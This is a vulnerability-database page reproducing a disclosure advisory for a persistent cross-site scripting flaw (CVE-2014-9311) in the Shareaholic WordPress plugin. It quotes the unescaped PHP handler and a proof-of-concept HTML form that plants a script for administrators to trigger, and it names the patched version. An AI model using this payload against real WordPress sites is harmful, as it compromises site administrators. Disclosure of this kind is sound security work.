Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtKacper Szurek1337DAY-ID-23488
HistoryApr 08, 2015 - 12:00 a.m.

Shareaholic 7.6.0.3 Persistent XSS Vulnerability

2015-04-0800:00:00
Kacper Szurek
0day.today
20

EPSS

0.001

Percentile

46.7%

JSON

Exploit for php platform in category web applications

# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
 
1. Description
 
ShareaholicAdmin::add_location is accessible for every registered user.
 
File: shareaholic\shareaholic.php
 
add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));
 
 
$_POST['location'] is not escaped.
 
File: shareaholic\admin.php
 
public static function add_location() {
    $location = $_POST['location'];
    $app_name = $location['app_name'];
    ShareaholicUtilities::update_options(array(
      'location_name_ids' => array(
        $app_name => array(
          $location['name'] => $location['id']
        ),
      ),
      $app_name => array(
        $location['name'] => 'on'
      )
    ));
 
    echo json_encode(array(
      'status' => "successfully created a new {$location['app_name']} location",
      'id' => $location['id']
    ));
 
    die();
}
 
http://security.szurek.pl/shareaholic-7603-xss.html
 
2. Proof of Concept
 
Login as regular user (created using wp-login.php?action=register) then:
 
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="shareaholic_add_location">
    <input type="hidden" name="location[app_name]" value="recommendations">
    <input type="hidden" name="location[name]" value="post_below_content">
    XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>">
    <input type="submit" value="Hack!">
</form>
 
XSS will be visible for admin:
 
http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings
   
3. Solution:
   
Update to version 7.6.1.0
https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip
https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/

#  0day.today [2018-01-01]  #

Related

cvelist 1
exploitdb 1
wpvulndb 1
prion 1
nvd 1
cve 1
packetstorm 1
exploitpack 1
patchstack 1
cvelist
cvelist
CVE-2014-9311
2015-04-14 14:00:00
exploitdb
exploitdb
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
2015-04-08 00:00:00
wpvulndb
wpvulndb
Shareaholic 7.6.0.3 - XSS
2014-11-10 00:00:00
prion
prion
Cross site scripting
2015-04-14 14:59:00
nvd
nvd
CVE-2014-9311
2015-04-14 14:59:02
cve
cve
CVE-2014-9311
2015-04-14 14:59:02
packetstorm
packetstorm
WordPress Shareaholic 7.6.0.3 Cross Site Scripting
2015-04-07 00:00:00
exploitpack
exploitpack
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
2015-04-08 00:00:00
patchstack
patchstack
WordPress Shareaholic Plugin <= 7.6.0 - XSS
2014-12-07 00:00:00

EPSS

0.001

Percentile

46.7%

JSON
Related for 1337DAY-ID-23488
cvelist1exploitdb1wpvulndb1prion1nvd1cve1packetstorm1exploitpack1patchstack1